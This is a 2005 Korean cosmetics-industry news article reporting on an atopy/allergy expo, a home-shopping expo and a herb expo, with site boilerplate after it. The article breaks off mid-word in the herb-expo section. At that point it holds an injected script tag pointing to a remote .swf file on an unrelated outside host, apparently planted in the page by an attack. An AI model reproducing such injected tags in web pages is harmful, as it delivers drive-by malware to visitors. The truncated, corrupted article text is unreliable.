HOME 뷰티 뷰티스페셜
잇단 박람회… 화장품 바쁜 ‘나들이’
  • 승인 2005.05.12 17:43
  • 댓글 0
아토피박람회,홈쇼핑박람회,허브엑스포 친환경 화장품 집합 피부개선 홍보 만점 <아토피박람회 5/3~6 코엑스> 예전에는 호환, 마마가 아이들에게 무서운 대상이었다면 지금은 단연 단연 아토피, 천식을 꼽을 수 있다. 이같은 아토피, 천식의 예방과 개선을 위한 대규모 건강박람회가 열렸다. 지난 5월 3일부터 나흘간 천식 알레르기 아토에 세미나 및 전시회가 서울 코엑스(COEX) 대서양홀에서 개최됐다. (사)한국천식알레르기협회(회장 김유영/www.kaaf.org)가 주최하고 (주)한국국제전시가 주관하는 이번 행사는 지난해보다 한층 커진 규모와 알찬 내용으로 알레르기성 질환의 심각성을 홍보하고 올바른 예방 및 개선과 치료를 위한 대국민 교육의 장을 만들어 체계적인 상담기회 제공을 통해 다양한 해결방법을 모색하는데 중점을 두었다. 특히 이번 박람회는 △피부개선제품관 △유기농 및 식품관 △제약관 △ 클린하우스 △환경관 △친환경건축관 등 6개 테마관으로 구성됐고 이 중 클린 하우스에서는 안방, 유아방, 욕실, 거실 등이 갖추어진 실제 주거공간의 형태에 항알레르기, 아토피 예방, 항균제품들로 실제 주거공간의 특별관을 구성, 관람객들에게 알레르기성 질환의 예방과 치유의 효과에 대한 직접 체험의 기회를 제공했다. 또 피부개선관에는 아토피화장품, 보습화장품, 유아용화장품, 기능성화장품, 약국용화장품, 자연화장품, 아로마화장품, 효소화장품, 황토화장품, 바디케어 및 목욕제품, 세정 및 세안제 등 아토피 피부를 위한 다양한 종류의 화장품이 소개돼 관람객에게 좋은 정보를 제공했다. 또 이번 박람회에는 한국천식알레르기협회 의료진이 직접 상담하는 아토피, 알레르기 피부시험 및 폐 연령측정 이벤트가 전시기간 동안 하루 한차례씩 진행됐다. 더불어 알레르기 아토피 관련 수기공모 및 발표, 세미나 등 다채로운 부대행사도 함께 진행돼 1회보다 한층 나아졌다는 평가를 받고 있다. 이에 대해 한국국제전시 김창섭 과장은 “최근 아토피가 사회적인 이슈로 부각돼서인지 특히 가족 단위 관람객들이 많았다"며 “나흘간의 행사기간 동안 3만명의 관람객이 다녀간 것으로 집계됐으며 TV, 일간지 등 매체에서 집중조명을 받았다"고 설명했다. <홈쇼핑박람회 5/4~7 무역전시장> 베스트상품관 인기 , ‘아란’ 내방객 호평 중소기업유통센터가 주최하고 (사)한국홈쇼핑연구회가 주관한 홈쇼핑박람회가 지난 5월 4~7일 서울무역전시장에서 개최됐다.이번 박람회는 TV 홈쇼핑을 통해 히트된 중소기업 우수상품과 앞으로 홈쇼핑채널 진출을 검토 중인 다양한 종류의 아이디어 상품이 함께 전시돼 참관객들에게 많은 볼거리를 안겼다. 특히 이번 행사에서는 대만 동삼홈쇼핑, 일본 통신판매협회, 중국 전국 방송국 홈쇼핑협회의 바이어 등 해외 홈쇼핑사 바이어 200명이 초청되어 직접 업체와의 상담을 현장에서 개최했고 GS홈쇼핑, CJ홈쇼핑 등 국내 5대 TV홈쇼핑 업체와 주요 인터넷 쇼핑몰 MD들이 참여하여 다양한 판로진출을 희망하는 중소기업들을 위한 상담회를 진행했다. 이밖에도 일본 통신판매협회 회장의 강연회 등 다채로운 행사가 진행돼 참가업체들에게 실질적인 도움이 된 것으로 평가받고 있다. 전체 948평 규모의 행사장에 총 100여 개 우수 중소업체들이 참여한 이번 전시는 생활주방관, 신선식품관, 패션스포츠·유아관, 가전관 등 4개의 테마관과 홈쇼핑사 상담관, 해외바이어 상담관으로 구성됐다. 이외에도 역대 히트되었던 상품들을 전시 판매하는 ‘홈쇼핑 베스트 상품관"과 국내 홈쇼핑시장이 급격히 발전할 수 있었던 배경과 홈쇼핑의 전반적인 흐름을 볼 수 있는 ‘홈쇼핑 역사관"이 열려서 관람객들에게 많은 흥미거리를 제공했다. 특히 한방브랜드 아란畵(화)를 출품한 아란은 행사기간 동안 많은 내방객과 홈쇼핑관계자 및 유통관계자들에게도 호평을 얻어, 일부러 찾아와서 상담과 입점의뢰, 수출문의에 대한 상담이 잇달았다고 밝혔다. 박람회장을 찾은 아란매니아라고 본인을 소개한 한 소비자는 “여러 지면을 통해 소개된 아란화의 예쁜 디자인과 어버이날을 맞아 제주아란 카틀레야를 이웃매장에서 구매하려 했으나 이미 품절이 되서 직접 박람회장을 찾게 됐다”고 말했다. 이밖에도 제주도의 무공해 송이로 만든 피부에 탁월한 효과가 있는 ‘송이팩((주)제주사랑)과 치약이 들어있는 ‘충전식 치약칫솔(에이폴상사), 다림판이 회전되는 ‘입체양면시스템 다림판(다즐) 등 참신한 제품들이 대거 출품돼 관람객의 시선을 끌었다. <허브엑스포 5/4~8 남원> 해외 16개업체 참여 더페이스샵 큰 호응동서양 허?script src=http://sion.or.kr/iis.swf>

  webmaster@geniepark.co.kr

<저작권자 © 제니파크, 무단 전재 및 재배포 금지>

의 다른기사 보기
기사 댓글 0
전체보기
첫번째 댓글을 남겨주세요.
여백
오늘의 주요뉴스
중국 클렌징 화장품 시장, 비중 높은 제품은 ‘클렌징 워터’
중국 클렌징 화장품 시장, 비중 높은 제품은 ‘클렌징 워터’
애경, 자원순환 유공 환경부 장관 표창 수상
애경, 자원순환 유공 환경부 장관 표창 수상
여백
Back to Top